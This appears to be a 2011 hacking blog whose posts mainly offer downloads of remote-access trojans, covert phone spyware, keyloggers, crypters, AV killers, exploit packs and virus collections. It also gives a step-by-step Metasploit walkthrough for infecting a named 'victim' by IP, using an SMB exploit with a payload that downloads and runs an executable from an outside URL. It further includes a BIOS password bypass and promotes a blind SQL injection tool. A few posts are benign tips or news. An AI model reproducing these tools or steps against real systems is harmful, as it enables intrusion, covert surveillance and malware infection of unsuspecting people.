Sunday, January 30, 2011

About infySEC and my personal thoughts

                                     Hi friends today i am going to share my few ideas about the infySEC workshop which i atten on  30.01.2011 regarding ETHICAL HACKING & INFORMATION SECURITY in ANNA UNIVERSITY -CHENNAI kurukshetra 2011.Its really some what great and i learn many hacking tricks .speaker of workshop MR.Vinod Senthil is a cyber security expert. he has won a Symantec Corporation's Trade Secret award for Prevention of mobile botnets. He has worked on several sensitive Government and private sector information security projects. He  has  been working  on  few Artificial  Intelligence engines lately and is recently congratulated personally by Mr. David Filo  the Co-Founder of Yahoo himself. His traits are he  is a very good orator, above all a nice person to move with.

Vinod Senthil in media: 
 ABOUT infySEC:
                   The infySEC is a rapidly growing security services organization,Our focus is on three areas: Client Security, Research & Development and building up intellectual capital with customers across Asia, US and Europe.InfySec is committed in providing an innovative set of services that address our clients. security needs. InfySec keeps focus on Research & Development, vulnerabilities Analysis ,tools development and few more services for more details visit http://www.infysec.com


DarkComet Remote Administration Tool v3.0

DarkComet-RAT (Remote Administration Tool) is software design to control in the best condition and comfort possible any kind of Microsoft Windows machine since Windows 2000.


This software allow you to make hundreds of functions stealthy and remotely without any kind of authorization in the remote process.
This software is a long time project, started the August 2008, DarkComet-RAT is now one of the best and one of the most stable RAT ever made and totally free. – (that’s what we like more about DarkComet RAT)

This RAT provides most of the features provided by others.
Download DarkComet RAT v3.0 here

Phone Creeper v0.98 latest version download ! :


Phone Creeper is a phone espionage suite It can be silently installed by just inserting an sd card with the files below on it. The program does not show up under installed programs or running programs and allows for a useful array or features. Phones running this software can be remotely controled by sms text messages. All commands will be silently received and deleted immediately and results will be issued back to sender. Pre-configured settings can be added to the installer to have your own default password and phone number to receive live updates. By default, this program will silently reinstall itself even after a hard reset, if the memory card with these files is still in the device.

This is the change log:

GETPOS command for GPS location now just grab and sends on demand to minimize battery & CPU usage
Block list will now also block SMS messages from users in list also, not just calls.
Emergency contact and SIM detection features fixed up.
GPS google maps link and coordinates 0,0 issues resolved.
FTP Setup command now only responds true if FTP is actually working (it runs a test first)
LIVE FTP command has been added as is working, however if you use this avoid SMS commands as much as possible since SMS commands might slip through during FTP uploads (Maybe a fix for next time.)
Log files have been trimmed to basic info only so as to not waste so much space.
Ignore features have been added to ignore logging number in the list.
ZAP feature has been added for silent uninstall, however it’s not fully working yet (next update).
Since we last blogged about Phone Creeper, the following new commands have been added:

password ftplive - To receive live updates of SMS and Call activity to your FTP server (setupftp must be set first)
password addign xxxxxxxxxxx - To add phone number to your ignore log list (it won't create logs of these numbers)
password delign - To remove phone number from your ignore log list (it will log this number again)

Download Phone Creeper v0.98 here.

News Source : Google

Saturday, January 29, 2011

Ultra Hacker Kit Special 150 tools

Hello friends, today i am introducing you a ultra hacker kit Isoftdl special, it consists of more than 150 working hacking tools. 
Note: This material is posted for educational purposes only!
Hacking in any form is punishable offense. This material may be used by you only for the study of vulnerabilities, and nothing more.

hack tools, hacking tools,hacking software


This Package Includes:
AddrView
AddrView gives you the ability to analyze HTML pages and extract most of the address URL, contained in them. AddrView retrieves the URL of images (img - tag), links to other files (a - a tag), CSS files, frames, Flash files and more. You can save the extracted addresses list to text files, HTML or XML files, or add these addresses to the hut.

AnonFTP
This package contains / var / ftp area for anonymous FTP access.

AppToService
The program enables the command line to run regular applications as a service (service).
However, to install any application as a service is completely free - just enough to take the recommendations of the Windows XP FAQ.

arpinject
Any computer on the network can be easy to take and send a packet ARP_REPLAY. And thus make changes to the ARP table. Such an attack is called ARP Poisonig. Its result - redirect traffic to the desired host. Send the packet (s) can be programmatically by using a tool ARPInject.

aspack21
Very nice wrapper *. exe and *. dll files (in some cases the degree of compression is 70%). In addition, the program is good (especially for programmers who are trying to protect their trousers) the complexity of extracting compressed file. I understand that he ASPack packed ASPACK'om same :-) Not bad, and that the program allows you to check before final packing job "prepackaged" exe-file, in violation of its normal operation, uncompress.
The new version has improved the speed of packing and adds an option "maximum compression". In unreported as the program runs 30 days. The interface is multilingual, including in Russian.

bios_pass_remover
Remove BIOS password

brutus
Brootforce xs which

Cable Modem Sniffer
Traffic interceptor cable modem

CapKeys_DIGITAL
Key update einfach per internet. abspeichern als SofCam.key und als textdatei moglich.

CGI Founder v1.043
Program for finding holes in CGI scripts.

CGISscan
Scanner CGI scripts

cports
Viewing connections and listening ports on your computer

craagle
The program for the automated search every seriynkov and keygens on many relevant archives.

CreditCardGjenerator

DeepUnFreez
"Makes computing environments easier to manage and maintain. Every Restart destroys all changes and reboots the computer to its original state, right down to the last byte"

E-mail Cracker
Recover forgotten mailbox passwords that are stored in the e-mail client. The program emulates the server POP3, and the password is sent back to the user. It supports any email client POP3.

ezDataBase_Defacer
Defeyser engine ezDataBase

FTP Brute Forcer
Brootforce FTP

ftpbr
Brootforce FTP

~ Censored ~ Mail Bomber 2.3
Bomer soap

G00B3RS_phpBB_exploit_pack
Pak exploits for phpBB Motor

Google_Hacker_1.2
Utility to help with queries from the series guglhak

grinder1.1
It helps you find instructions in the file specify the range of IP-address.

HackersAssistant
Software package for a hacker: Port Scanner, Ping Flooder, Server Slower, Connections, File Cleaner, Get Passwords, IP Validator, Web Browser, Ip Information, HTML Stealer, Site IP Retrieval, Winsock Scanner, exe Corruptor, Nuker, Hit Increaser, File Generator, Anonymous e-mail, Whois, Binary

HackTheGame
HackTheGame this game simulator life hacker. In which you take on the role of a hacker. Which xs for what and how to break the system. Join showdown with hack portals, in general, live a long and merry life. The main thing is not to get caught would be rubbish.

Hotmail Email Hacker / Hotmail HAcker Gold / Hotmail ScamPage / HotmailHack
In my still some sort of a heresy, not long running, hotmylo not so easy to hack

hydra-4.6-win
THC-Hydra - threaded cracker passwords to various services (FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, CISCO, etc.) for UNIX platforms. With this tool you can attack several services at once.

iecv
Internet Explorer Cookies View

ipnetinfo
The program, which displays information about IP address. It allows you to display detailed information concerning the country, the owner of the domain, the range of available IP addresses, contact information and much more. This tool will be useful, for example, when you need to know the origin of the mail received from an unknown destination. For this is enough simply to copy the message headers from your email program IPNetInfo. It will extract itself from the text of all IP addresses and make the necessary search. The software uses several Whois servers, thereby maximizing the impact of the search for a specific network address. Among other things, it allows you to create HTML report, which stores all necessary information about the selected IP addresses.

john-17w
password cracker, currently available for UNIX, DOS, Win32. Its main aim is to detect weak passwords UNIX. To the program you can buy a collection of word lists over 600 MB, with the help of which greatly simplifies the selection of passwords.

Key Changer
Commercial ($ 8.00) is free from trojans, designed to find and change the product key, Windows XP, such as piracy on the validity (if any). XP Key Changer after launch, finds the proposed changes to the key, and the name and organization registered in the system provided by Windows XP. Program XP Key Changer allows you to change XP Product Key and all this information, one click on all machines. Works with all service packs, including Windows XP SP3!

Key_Logger
keylogger R)

Legion NetBios Scanner v2.1
Scanner NEtBios Resources

Mail Boomb_2.0 YAHOO
Bomber soaps Yahoo

MooreR Port Scanner
Port scanner on the remote machine

MSN Flooder 2.0
Fluder messenger msn

NET BIOS Scanner
Scanner NEtBios Resources

NetBIOS Name Scanner
Scanner NEtBios Resources

NetResView
Scanner NEtBios Resources

NFO Maker 1.0
This plugin is for viewing nfo and diz files, which are usually located in the downloaded archive.
Warning: as reported by the author, "Unfortunately there was an unfortunate mistake. Setting.reg File added to the archive with the plugin. Setting.reg file separately can be downloaded here http://issoft.narod.ru/downloads/setting.reg

Nimda
"Nimda" is an Internet worm that spreads via the Internet as a file attachment in an e-mail, local area networks, as well as penetrating the unprotected IIS-servers. The original host file has the name of the worm README.EXE and is a program format Windows PE EXE, the size of about 57 kilobytes, and is written in Microsoft C + +.

NTPacker
Packer files

On-Off MSN
What is vklyuchalka vyklyuchalka MSN

PCAnyPass
PCAnywhere PassView Image of passwords with asterisks

Php Nuke Hacker v11.0
Burglar engine php nuke

phpBB Annihilator / phpbb attack / phpbb bruteforcer / PhpBB pass extractor / phpBB_DoS / phpbb_spammer / phpBBAttacker / phpBBcracker
A set of tools for hacking, spam, flood, ddos, Brutus phpBB

PhpBuGScan
Scanner bugs in scripts nxn

Ping & Nukes
pinger \ nyuker

Listener XP
The program allows to monitor network ports on your system, generating a pop-up window when trying to access the port. The program writes a log file of IP-addresses of connectable clients and sends you a request for permission to use it. You can enter the port numbers of their choice, or the program will prompt you to the default list. The program runs from the system tray.

pqwak2
This program for the selection of network paroley.Dostatochno quickly picks up a password on the specified drive on the network.

procexp
PROCEXP displays information about the processes of loading dynamic libraries and their svoystvah.Eto makes PROCEXP m schnym tool for understanding the internal behavior of applications as trace information leakage marker and DLL, version mismatch. And even the indirect determination of viruses.

ProxyPro
Scan, ping, proxy switches

rainbowcrack-1.2-src win-lin
The program allows you to create a predsgenerirovannyh LanManager hashes, with which you could almost instantly to crack almost any alphanumeric password.

Remote Shut Down
Vykyuchenie remote machine

ResHacker
Correction exe and dll files. Much can change in them. With this program you can easily Russify program.

RpcScan101
Network port scanner

Sasser
Sasser virus looks like the exhausted millions of Internet users worldwide in summer 2003 lovesan (blaster). Already, he has several of its modifications, which experts say is even more harmful than the original. The same way according to experts, this virus does not pose a threat to your hard drive, but only prevents the use of them fully functional. Its distinctive features - a message appears on trying to connect to the ip address of another computer and the error message LSA Shell (Export version) and follows it to restart the computer from a fatal error process lsass.exe

SendMailer
Sends a message in HTML format and in any encoding without mail client. Checks completion of mandatory fields. Checks E-Mail on the right (syntax). Converts special characters into HTML format. Allows you to specify multiple addresses to choose from. Checks sent and reports errors. Ability to send a copy to the sender. Very easy to configure. Also fits easily into any design. Gives ample opportunity to hide the real address. If desired, sends information about the browser and the IP address

Server 2003 Keygen
keygen for WINDOWS 2003 server

Server Killer
Ubiytsa servers R)

showpassv10
Opening a password for zvezdochkmi

sitedigger2
The program looks in the cache of Google potential vulnerabilities, errors, configuration problems on Web sites. The new version of the new version you can use FSDB / GHDB and generate 10 results for each signature. Posted as a large number of new signatures - open webcams, credit card numbers, etc.

SMBdie
WinNuke back! Introducing exploit completely kills or WinNT/2K/XP. NET machine with Network Share Provider (works on 139 and / or 445 port). Uses a malformed SMB (Server Message Block) packet is used anonymously, no account do not need to know - for only the IP address and computer name.

SQLScan v1.0
Utility guessing the password to Microsoft SQL server. Lets you scan a range of IP addresses. When backwater password creates an NT account with a blank password on a vulnerable system.

Stealth - HTTP Scanner v1.0 build 23
powerful tool for auditing security Web server, which looks at more than 19.000 vulnerabilities.

SuperScan4
Port scanner with a bunch of utilities. Also there is a useful utility that pulls out from companies (windows) all of the available Old using zero session.

tftpd32.273
a small freeware program, which includes simple to configure DHCP, TFTP, SNTP and Syslog servers as well as TFTP client

traceroute
This is a utility computer program designed to identify routes data networks TCP / IP.

udpflood
UDP packet sender. Tool flood UDP packets to specified IP and port. Used to test the stability of network services to a UDP flood. Packages can be specified by the user or be completely random.

Ultra Dos
Program for DDOS remote machine

WebCracker 4.0
Cute program to guess passwords for sites.
and much more....

                                       DOWNLOAD:
HOTFILE      ||   FILE SERVE

Thursday, January 27, 2011

Download Free Hacking Tools: 33 Best Hacking Tools

Well, I've gained a lot of tools , so I decided it'd be a good idea to give some of it back to the community. I've made this pack which contains most of my hacking tools collection (though not all Non). There's 33 (or more) tools in here.

KEYLOGGERS & PASSWORD STEALING:

- Ardamax 2.8
- Ardamax 3.0
- Fake Messenger w/ password retriever (Revenge Messenger)
- Silent Keylogger by BUNNN
- Digital Keylogger v3.3
- Infinity YouTube cracker (doesn't work according to many but its still present)

CRYPTERS AND BINDERS:

- File Joiner v2.01
- File Injector v3
- Xeus Technologies HotFusion binder
- Japabrz's Csharp crypter
- Daemon Crypt V2
- Crypter v1.2
- nBinder v5.5 premium
- Easy Binder v2
- Shell Labs Icon Changer
- ShockLabs file binder
- uBinder v1.30 SE (someone's private binder, it is almost FUD)

FREEZERS & BOMBERS:

- Frozen Land MSN Freezer v1
- Facebook Freezer
- Hotmail Lockers
- Email Bomber (an HTML page, no exe required!)

RATS:

- Beast v2.07
- BitFrost v1.2
- Dark Moon v4.11
- Lost Door v2.2 Stable public edition
- MiniMo v0.7 public beta
- Nuclear RAT v2.1.0
- Optix v1.33
- PaiN RAT 0.1 beta 9
- Poison Ivy v2.3.2
- Shark 3
- Spy-Net v.1.7
- Y3 RAT v2.5 RC 10

OTHERS:

- Proxy Switch v3.9 Ultimate
- Savk AV Killers (all 5 safe and deadly versions)
- Ardamax keylogger remover

NOTE: All software is full and cracks/serials are included, there are no trials or demos.

SAFETY: It would be best to run all these tools either Sandboxed, or from a Virtual Machine.

Recover FireFox Passwords using FireFox Password Viewer

FirePasswordViewer is the GUI version of popular FirePassword tool to recover login passwords stored by Firefox. Like other browsers, Firefox also stores the login details such as username, password for every website visited by the user at the user consent. All these secret details are stored in Firefox sign-on database securely in an encrypted format. FirePasswordViewer can instantly decrypt and recover these secrets even if they are protected with master password.
Also FirePasswordViewer can be used to recover sign-on passwords from different profile (for other users on the same system) as well as from the different operating system (such as Linux, Mac etc). This greatly helps forensic investigators who can copy the Firefox profile data from the target system to different machine and recover the passwords offline without affecting the target environment.

Using FirePasswordViewer

FirePasswordViewer is the standalone application and it does not require any installation. You can just run it by double clicking on the executable file.

Here are the brief usage details.

  • On running, FirePasswordViewer automatically populates the Firefox profile location if it is already installed. Otherwise you can enter the profile location manually.
  • If you have set the master password for your Firefox, then you need to specify the same in the master password box.
  • Once the profile location is specified, you can click on "Start Recovery" button and FirePasswordViewer will instantly recover all passwords from Firefox sign-on store.
  • By default passwords are not shown for security reasons as it is sensitive data. However you can click on "Show Password" button to view these passwords.
  • Finally you can save all recovered password list to HTML file by clicking on "Save as HTML" button.

You can also use FirePasswordViewer to recover passwords from different system either Windows or Linux. In that case you can copy Firefox profile data from remote system to local machine and then specify that path in the profile location field for recovering the passwords.

Screenshots of FirePasswordViewer



Screenshot 2: Showing the hidden passwords recovered by FirePasswordViewer on clicking "Show Password" button.






Download FireFox Password Viewer Here
..................................................................................................................

Enable Telnet in windows 7


It’s very rare that I use Telnet these days, so it took a long time for me to notice that by default it was not packaged with Windows 7. I did some research and found out that this was also true for Windows Vista. More than likely this was an attempt to make Windows more secure by default, as Telnet is very insecure and whenever you have the choice you should always use SSH. However, with that being said, you can quickly re-enable Telnet by following these steps:
  1. Start
  2. Control Panel
  3. Programs And Features
  4. Turn Windows features on or off
  5. Check Telnet Client
  6. Hit OK
After that you can start Telnet via Command Prompt. Credits FettesPS

LOCK YOUR FOLDERS WITHOUT ANY SOFTWARES

This is a very simple batch file trick. Paste the given code in batch file and save it as with any name.(remember Batch file extension is .bat). Double click on this batch file to create a folder locker. Now you will see a folder name Locker at the same directory of batch file. Put all files which you want to hide in the Locker folder. Double click on this batch file to lock the folder 'Locker'. If you want to unlock your files,double click the batch file again and you would be prompted for password. Enter the password and enjoy access to the folder.



if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK

if NOT EXIST Locker goto MDLOCKER

:CONFIRM

echo Are you sure u want to Lock the folder(Y/N)

set/p "cho=>"

if %cho%==Y goto LOCK

if %cho%==y goto LOCK

if %cho%==n goto END

if %cho%==N goto END

echo Invalid choice.

goto CONFIRM

:LOCK

ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

echo Folder locked

goto End

:UNLOCK

echo Enter password to Unlock folder

set/p "pass=>"

if NOT %pass%==type your password here goto FAIL

attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker

echo Folder Unlocked successfully

goto End

:FAIL

echo Invalid password

goto end

:MDLOCKER

md Locker

echo Locker created successfully

goto End

:End

Tuesday, January 25, 2011

What is Double Password?


Strong passwords should have a significant length and cannot contain normal words. Only random digits and letters of different case. Such passwords are extremely hard to remember and it takes time to enter. But, even strong passwords have their weaknesses. When you type a password, it can be intercepted by a spy program that logs all your keystrokes. Others can see what you type (even if the password field on the screen is masked, the password can be read by buttons you hit on your keyboard.)
Until now, the only solution was to buy a secure token. A secure token is a hardware key that is used instead of or in addition to your normal password authentication. There are two main problems with the hardware solution, though. First, it is expensive. And second, you can use them only with software that has built-in support for this method of authentication.


 
But, from now on, you can turn any USB flash drive into a secure token! No need to purchase an additional expensive device. All you need is about 2 megabytes of free space on your flash drive or other USB gadget, such as an MP3 player, PDA or even a USB-pluggable mobile handset.
Strong Password

How does it work?
 Our software, Double Password, installs onto your flash drive. When you type a password, the program intercepts it and converts it into a super-strong password string on-the-fly. You can use simple, easy-to-remember passwords without the risk of being cracked.
Another benefit of using Double Password is that nobody can steal your passwords. Spy programs are useless. Even if someone gets the “weak” password that you type on the keyboard, it means nothing. This password will only work when your USB flash is inserted.
While typical hardware locks will work only with software that supports secure tokens, Double Password works with any software. It simply substitutes your weak password with a strong one.
Double Password can be effectively used to securely lock your Windows account, to protect your laptop and to bring a new level of security to all software that uses password authentication.
                                                                      Download Double Password For Free

Here is the Best way to Crack the BIOS password


There are a lot ways to Crack the BIOS password. This is one of them but I would say that this one is more effective than the rest because the rest of the ways does not Guarantee you that it will Crack the BIOS password while in this case the Cracking is Guaranteed since in this we will remove the functionality of password protection of the BIOS.
Follow the steps below:
[eminimall]
1) Boot up windows.
2) go to dos-prompt or go to command prompt directly from the windows start up menu.
3) type the command at the prompt: “debug” (without quotes ninja.gif )
4) type the following lines now exactly as given…….
o 70 10
o 71 20
quit
exit
4) exit from the dos prompt and restart the machine
password protection gone!!!!!!!!!!!!!
EnjoYYYYYYYYYY
PS: I tested this in Award Bios……..
There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine………..
I have not found any other trouble if the codes are used.
To be on safe side, just back up your data……….
The use of this code is entirely at ur risk……….
It worked fine for me……….

Pak Cyber hackers hack Cochin Port website

KOCHI: Cyber hackers from Pakistan are alleged to have hacked the website of the Cochin Port Trust, investigations have revealed.

The cyber wing of police found that the portal was hacked from a Pakistan Internet Protocol (IP) address.

"We have handed over the log details to CBI Interpol Cyber wing," Police Commissioner Manoj Abraham told PTI.

The hacking was done at 0830 am on January 19. Cochin Port Trust said the hackers left an anti- national message on the site.

A closer examination of the site also revealed that the hacker had left behind an alternate homepage and had not actually changed or edited the contents of the CPT website.

The port filed a complaint with the police following which the cyber wing began its investigations.

"Actions are being taken to restore the website with all possible security provisions and avoid recurrence of such incidents in future," the port said.

All the system logs have been forwarded to the Cyber Crime Cell under the Cochin City Police Commissioner.

The attack has impacted only on the information display and sharing related to Cochin Port Trust and has in no way touched or impacted the usage of the Integrated Enterprise Resource Planning solution (christened the ePort). All activities at the port, in all the departments, which are using the ePort solution are going on as usual, the port said.

Read more: Pak hackers 'hack' Cochin Port website - The Times of India http://timesofindia.indiatimes.com/tech/news/internet/Pak-hackers-hack-Cochin-Port-website/articleshow/7354083.cms#ixzz1C2pDy6h2

Monday, January 24, 2011

Infecting Your Victom through IP





Many of the times I saw this question asked here & everywhere on the Blog that
“Is it possible to infect victim using his IP address?”

So, I am going to show you how to do it.


Requirements:


Nmap

Metasploit

First of all you need target ip of your victim.


Then open Metasploit Console & type db_create.

[Use: This’ll create or connect you to database.]

Once you do that type Nmap.

[Use: This’ll load Nmap in Metasploit Console]

Next you need to type db_nmap -sT -sV

[This’ll scan OS, Ports, and Services running on victim’s computer.]
Wait for 5 min’s to complete its scan.
Once done, Note down the OS, Ports, and Services running on victim’s computer.

Now it’s time to exploit victim’s machine.

Exploit depends on the OS, Ports, and Services running on victim’s computer.
So, you’re lucky if you get OS WIN XP or 2000 because it’s easy to exploit them.
No matter weather they’re protected by any firewall or not.

Now I’ll tell you exploiting:-


Windows 2000 (all versions SP1, SP2, SP3, SP4)

Windows XP (all versions SP1, SP2, SP3)

Type show exploits

[Use: This’ll show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi

[Use: This’ll select the exploit windows/smb/ms08_067_netapi]

Now Type show targets

[Use: This’ll show all targets by exploit]

Now Type set target 0

[Use: This’ll set target to 0 specified]
Then type show payloads
[Use: This’ll bring up all the payloads]
Next type set payload windows/download_exec
[Use: This’ll set payload as windows/download_exec]

Then Type show options

[Use: This’ll show all options in the exploit & payload]
In window you’ll see many options, in which you need to
Fill only two options RHOST & URL.

Type set RHOST

[Use: This’ll set RHOST (victim’s ip) to xxx.xxx.xxx.xxx]

Next Type set URL
http://www.xxxx.com/xxx.exe
[Use: This’ll set URL to your direct server link.]

At last you need to type exploit

[Use: This will launch your exploit & your victim will be infected.]

You can now control you're victim with RAT.

So, any versions of Win 2000-XP can be exploited easily.
In case if you didn’t get this two OS’, immediately after Nmap scan
You can use the command db_autopwn –p –t –e.
In most cases you get a shell.

Good Luck!


download SqlInjector v.1.0.2 | blind SQL injection tool


download SqlInjector v.1.0.2 
blind SQL injection tool



SQLInjector is a tool to perform blind SQL injection in a website. This version only supports MS SQL Server. It uses time based inference to determine true or false conditions to extract data. The key feature is that it uses a binary search mechanism to reduce the character search address space, this means it can get each character value within 7 to 8 requests. 



This is a fairly major update to SqlInjector (yes renamed from BlindSqlInjector). The key change is the addition of true/false inference. So if you have SQLi then its definitely faster to use true/false inference rather than time. 

Its features are:
  • Ability to export data
  • Binary search for faster character identification
  • Completely blind injection using time based inference
  • True/False inference
  • Supports MS SQL Server
  • Extracts database name
  • Extracts current user
  • Extracts server version
  • Extracts table names
  • Extracts column names
  • Extracts column data types
  • Extracts column lengths
  • Configurable space encoding
  • Configurable wait timing
  • Tree view display of enumerated data
  • Resume support
  • Save/Loading of project files
  • Proxy support
  • Authentication support (Basic, Negotiate, Digest, NTLM, X509)

Download Here

400 Viruses In 1 File



....................................................................................................
 
400 Viruses In 1 File  
Avispa.dr
Dark Avenger
AVA.550
Univ/a
Auspar.377
Auspar.338
OC/oops
Middle
Auspar.635
Aus-Term.mp.3490
Jeru.1413
OC/scud
Auspar.dr
Auspar.635
Auspar.615
Auspar
Aust.543
Auspar.424
Auspar.377
Auspar.338
Auspar.292a
Auspar.215
Auspar.187
Auspar
Univ/b
Aurea.653
Iron-Maiden
Akuku.1111
Akuku.889
Akuku.886
NRLG.b
Attitude
Attention.394
HLL.ow.4505
Attention.394.dam
Xany
Univ/g
Univ/q
Univ.cmp
OC/vcl
Atomant.2143
AT
Atomic.350
Astra.1010
Suriv.dr
Comasp
Shocker.cmp.7000
Tiebud
BtDr.b
Ash.743
Univ/r
Armagedon.y
Armagedon
Vienna
ARCV.Scy.1208
ARCV.Scroll.795ARCV.Scroll.dr)
ARCV.Sand.1172
ARCV.More
ARCV.Kiss
ARCV.Jo.986
ARCV.Jo.912a
ARCV.250.dr
ARCV.642
ARCV.639a
ARCV.1183.dr
ARCV.Anna.742.dr
ARCV.639a
ARCV.Jo.916
ARCV.839
ARCV.Slime.773
ARCV.Ice
ARCV.Ice
Arara.dr
Arara.1054
Arab.834
Armagedon.y
QScreen3
Suriv.1488
Suriv.dr
Dark Avenger.2000
Jerusalem.cr
Jerusalem.cr
APLittle.153
Jerusalem.ch
Jeru.1808.a
QZap141
Pixel.845
Pixel.k
Ambulance
AlphaStrike.2000
Alien.733.a
Alia.1023
YD.1049.a
Alex.1951
Brain
Albania
Alabama.1560.a
Akuku.886
Tiebud
BtDr.Aircop
BtDr.b
HLL.ow
HLL.cmp.8064
AHADisk
Agiplan
YDOC/vcl
Syslock.dropped
NRLG.b
V2P6.1993
Dead
BitAddict
ARCV.Scroll.795
ARCV.Scroll.dr
Acid.dr
and alot moreI am not responsible if any of the files are infected, it is users responsibility to scan files before using them..

Code:
...........................................